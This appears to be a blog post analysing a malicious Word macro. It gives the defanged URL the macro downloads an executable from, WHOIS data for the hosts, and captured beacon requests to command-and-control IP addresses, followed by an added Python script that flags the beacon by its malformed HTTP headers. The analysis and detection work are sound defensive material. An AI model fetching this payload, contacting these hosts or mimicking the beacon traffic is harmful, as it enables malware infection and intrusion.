I was sent a strange e-mail earlier today as a word document.
It contained a heavily obscured macro that downloaded a file:
httX://gpsbah.com/images/1.exe
gpsbah.com resolves to 173.230.242.18
NetRange        173.230.240.0 - 173.230.255.255
CIDR            173.230.240.0/20
Name            ACENETMI
Handle          NET-173-230-240-0-1
Parent          NET173 (NET-173-0-0-0-0)
Net Type        Direct Allocation
Origin AS       AS36444 AS2828
Organization    ACENET, INC. (ACENE)
This is worrying, as the domain gpsbah.com seems to be associated with a card payment processor and issuer!
Global Payment Services
P.O.Box: 2110
Manama
Kingdom of Bahrain
I’ve contacted them and will update this post if they respond.
When the exe file is run, it connects to and exchanges encrypted or obscured data with 62.75.182.94:
inetnum:        62.75.128.0 - 62.75.255.255
netname:        DE-INTERGENIA-20010727
descr:          PlusServer AG
country:        DE
org:            ORG-iGCK1-RIPE
admin-c:        TS12776-RIPE
tech-c:         IT1309-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      INTERGENIA-MNT
mnt-lower:      MAINLAB-MNT
mnt-routes:     INTERGENIA-MNT
mnt-routes:     MAINLAB-MNT
source:         RIPE # Filtered
POST /gWFOZM~5MV~R%26/Sg=%7EKls%3Fc.A/%2B HTTP/1.1
Host: 62.75.182.94
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: octet/binary
Accept: */*
Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4
Content-Length: 4962

A......CA..."......]......@_*J+0L"........JE.LKELKJKJ..K.OIJ...I.M_]......@_LOH_]......@_HKNDO_]....@_..._]...@_NO_RCA....CA\&>9<)<&0......];......]NMSM]U.EK]..P:?T]UNMSMTF0........]2.....]-...........]-...]OMLM]ULISMSJMLHSLMMMTF2.....]+0]+......?..]:....]<........]ISNSLM]UISNSLMSMTF/...-.....]>....]ULJSMSLMTF*../</]HSLM]UNOP...T]UHSLMSMTF/...9.

POST /eozHt~R~C%2CGlz/Z&SCFSHCaEe+/%3F HTTP/1.1
Host: 62.75.182.94
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: octet/binary
Accept: */*
Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4
Content-Length: 4962

A......CA..."......]......@_*J+0L"........JE.LKELKJKJ..K.OIJ...I.M_]......@_LOH_]......@_HKNDO_]....@_..._]...@_NO_RCA....CA\&>9<)<&0......];......]NMSM]U.EK]..P:?T]UNMSMTF0........]2.....]-...........]-...]OMLM]ULISMSJMLHSLMMMTF2.....]+0]+......?..]:....]<........]ISNSLM]UISNSLMSMTF/...-.....]>....]ULJSMSLMTF*../</]HSLM]UNOP...T]UHSLMSMTF/...9.
I’ve also seen it try to POST to 208.89.214.177 but fail.
NetRange            208.89.208.0 - 208.89.215.255
CIDR                208.89.208.0/21
Name                VIRPUS-KC-1
Handle              NET-208-89-208-0-1
Parent              NET208 (NET-208-0-0-0-0)
Net Type            Direct Allocation
Origin AS           AS32875
Organization        DNSSLAVE.COM (VIRPU-1)
Registration Date   2008-04-25
Last Updated        2012-03-02
Comments            http://www.virpus.com
GET /V3n7%3F0i1r7/s.U87BRsV%7ESkt1f%3F7xIxYE/vtlMjyijVjnr HTTP/1.1
Host: 208.89.214.177
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: octet/binary
Accept: */*
Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
Date: Tue, 21 Oct 2014 17:09:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 147
Connection: close
X-Powered-By: PHP/5.5.16-1~dotdeb.1
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> </body></html>
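The captured requests above share a few header quirks that a real browser never produces: the Content-Type "octet/binary" is not a registered MIME type (browsers send application/octet-stream), the Accept-Language value begins with a bare "q=0.8" weight instead of a language tag, and the Host header is a raw IP address. The script below, an added example that is not part of the original post, parses raw HTTP request heads and flags those quirks so the beacon can be picked out of proxy or IDS captures. The first sample request is the header block from the first POST shown in the post; the benign request is constructed for comparison, and the function names are my own.

```python
"""Flag HTTP requests matching the beacon traffic shown in the post.

Added example, not part of the original post. The indicators come from the
captured requests above; the benign sample request is constructed.
"""
import re
from typing import Dict, List

# Header values observed in the captured beacon requests
BEACON_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
BOGUS_CONTENT_TYPE = "octet/binary"        # not a real MIME type; browsers use application/octet-stream
BOGUS_ACCEPT_LANGUAGE = re.compile(r"^q=")  # Accept-Language must start with a language tag, not a weight
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")

# Header block of the first POST captured in the post (body omitted)
BEACON_REQUEST = "\r\n".join([
    "POST /gWFOZM~5MV~R%26/Sg=%7EKls%3Fc.A/%2B HTTP/1.1",
    "Host: 62.75.182.94",
    "Connection: Close",
    "User-Agent: " + BEACON_USER_AGENT,
    "Content-Type: octet/binary",
    "Accept: */*",
    "Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4",
    "Content-Length: 4962",
    "", "",
])

# Constructed request from an ordinary browser, for comparison
BENIGN_REQUEST = "\r\n".join([
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "User-Agent: " + BEACON_USER_AGENT,   # same IE11 UA string, so the UA alone must not trigger
    "Accept: text/html,*/*;q=0.8",
    "Accept-Language: en-GB,en;q=0.5",
    "Connection: keep-alive",
    "", "",
])


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP request head into method, path and a lower-cased header dict."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def beacon_indicators(raw: str) -> List[str]:
    """Return the list of beacon indicators present in a raw request head."""
    req = parse_request(raw)
    h = req["headers"]
    hits: List[str] = []
    if h.get("content-type") == BOGUS_CONTENT_TYPE:
        hits.append("content-type octet/binary")
    if BOGUS_ACCEPT_LANGUAGE.match(h.get("accept-language", "")):
        hits.append("accept-language starts with a q= weight")
    if IPV4_HOST.match(h.get("host", "")):
        hits.append("host header is a bare IP address")
    if req["method"] == "POST" and h.get("user-agent") == BEACON_USER_AGENT:
        hits.append("POST with the IE11 user-agent string seen in the beacon")
    return hits


def is_beacon(raw: str) -> bool:
    """A request is flagged when either malformed-header indicator is present.

    The bare-IP host and the user-agent are only supporting evidence, since
    legitimate traffic produces both on their own.
    """
    hits = beacon_indicators(raw)
    return any(h.startswith(("content-type", "accept-language")) for h in hits)


if __name__ == "__main__":
    for label, sample in (("captured beacon", BEACON_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", "FLAGGED" if is_beacon(sample) else "clean", beacon_indicators(sample))
```

The two malformed headers are the strong signals because they come from the implant's hand-written HTTP stack rather than from any browser, so they survive a change of C2 address; the IP-as-Host and user-agent checks are kept as supporting context only.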
A full report can be found here.